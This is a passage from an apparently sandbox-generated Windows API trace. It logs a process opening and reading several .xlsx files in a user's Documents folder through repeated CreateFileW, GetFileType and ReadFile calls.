ftLastAccessTime.dwHighDateTime=0x1d7e335, ftLastWriteTime.dwLowDateTime=0x6ad49ed0, ftLastWriteTime.dwHighDateTime=0x1d7e335, nFileSizeHigh=0x0, nFileSizeLow=0x160ba)) returned 1 [0217.339] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\gZN4L.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\gzn4l.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.339] GetFileType (hFile=0x354) returned 0x1 [0217.339] GetFileType (hFile=0x354) returned 0x1 [0217.339] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.340] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.341] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.341] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.342] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.342] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.342] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.343] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.343] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.344] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.344] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.344] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.346] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.346] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.346] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.347] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.347] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.347] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.348] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.348] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.349] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.349] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.349] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0xba, lpOverlapped=0x0) returned 1 [0217.350] ReadFile (in: hFile=0x354, lpBuffer=0x27156c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27156c4*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.353] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\HEibir9NnU16o.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\heibir9nnu16o.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.353] GetFileType (hFile=0x354) returned 0x1 [0217.354] GetFileType (hFile=0x354) returned 0x1 [0217.354] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.355] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.355] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.356] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.356] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.356] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.357] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.357] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.357] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.358] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.358] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.358] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.359] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.359] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.359] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.360] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.360] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.360] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.361] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.361] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.361] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.362] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.362] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.362] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.363] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0xa56, lpOverlapped=0x0) returned 1 [0217.363] ReadFile (in: hFile=0x354, lpBuffer=0x27461fe, nNumberOfBytesToRead=0x1aa, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27461fe*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.363] ReadFile (in: hFile=0x354, lpBuffer=0x2746c14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2746c14*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.414] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ojE VKo4d6A0cKjlKcS.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\oje vko4d6a0ckjlkcs.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.414] GetFileType (hFile=0x354) returned 0x1 [0217.415] GetFileType (hFile=0x354) returned 0x1 [0217.415] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.416] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.416] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.417] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.417] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.418] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.418] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.418] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.419] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.419] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.419] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.420] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.420] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.420] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.421] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.421] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.421] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.421] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.422] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0xf4f, lpOverlapped=0x0) returned 1 [0217.422] ReadFile (in: hFile=0x354, lpBuffer=0x277b767, nNumberOfBytesToRead=0xb1, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277b767*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.422] ReadFile (in: hFile=0x354, lpBuffer=0x277c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x277c078*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.425] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\OKmk8I 8.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\okmk8i 8.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.425] GetFileType (hFile=0x354) returned 0x1 [0217.426] GetFileType (hFile=0x354) returned 0x1 [0217.426] ReadFile (in: hFile=0x354, lpBuffer=0x27b8814, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27b8814*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.427] ReadFile (in: hFile=0x354, lpBuffer=0x27b8814, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27b8814*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.427] ReadFile (in: hFile=0x354, lpBuffer=0x27b8814, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27b8814*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.428] ReadFile (in: hFile=0x354, lpBuffer=0x27b8814, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27b8814*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.428] ReadFile (in: hFile=0x354, lpBuffer=0x27b8814, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27b8814*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.429] ReadFile (in: hFile=0x354, lpBuffer=0x27b8814, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27b8814*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.429] ReadFile (in: hFile=0x354, lpBuffer=0x27b8814, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27b8814*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.429] ReadFile (in: hFile=0x354, lpBuffer=0x27b8814, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27b8814*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.430] ReadFile (in: hFile=0x354, lpBuffer=0x27b8814, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27b8814*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.430] ReadFile (in: hFile=0x354, lpBuffer=0x27b8814, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27b8814*, lpNumberOfBytesRead=0x36f214*=0x26, lpOverlapped=0x0) returned 1 [0217.430] ReadFile (in: hFile=0x354, lpBuffer=0x27b8814, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27b8814*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.432] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\pPsiR-hK.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\ppsir-hk.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.432] GetFileType (hFile=0x354) returned 0x1 [0217.432] GetFileType (hFile=0x354) returned 0x1 [0217.433] ReadFile (in: hFile=0x354, lpBuffer=0x27e96d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27e96d4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.434] ReadFile (in: hFile=0x354, lpBuffer=0x27e96d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27e96d4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.434] ReadFile (in: hFile=0x354, lpBuffer=0x27e96d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27e96d4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.435] ReadFile (in: hFile=0x354, lpBuffer=0x27e96d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27e96d4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.435] ReadFile (in: hFile=0x354, lpBuffer=0x27e96d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27e96d4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.435] ReadFile (in: hFile=0x354, lpBuffer=0x27e96d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27e96d4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.436] ReadFile (in: hFile=0x354, lpBuffer=0x27e96d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27e96d4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.436] ReadFile (in: hFile=0x354, lpBuffer=0x27e96d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27e96d4*, lpNumberOfBytesRead=0x36f214*=0x4b8, lpOverlapped=0x0) returned 1 [0217.436] ReadFile (in: hFile=0x354, lpBuffer=0x27e8b20, nNumberOfBytesToRead=0x348, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27e8b20*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.436] ReadFile (in: hFile=0x354, lpBuffer=0x27e96d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x27e96d4*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.438] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\zO0R7X8yiTCHz9z6m9mt.xlsx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\zO0R7X8yiTCHz9z6m9mt.xlsx", lpFilePart=0x0) returned 0x36 [0217.438] 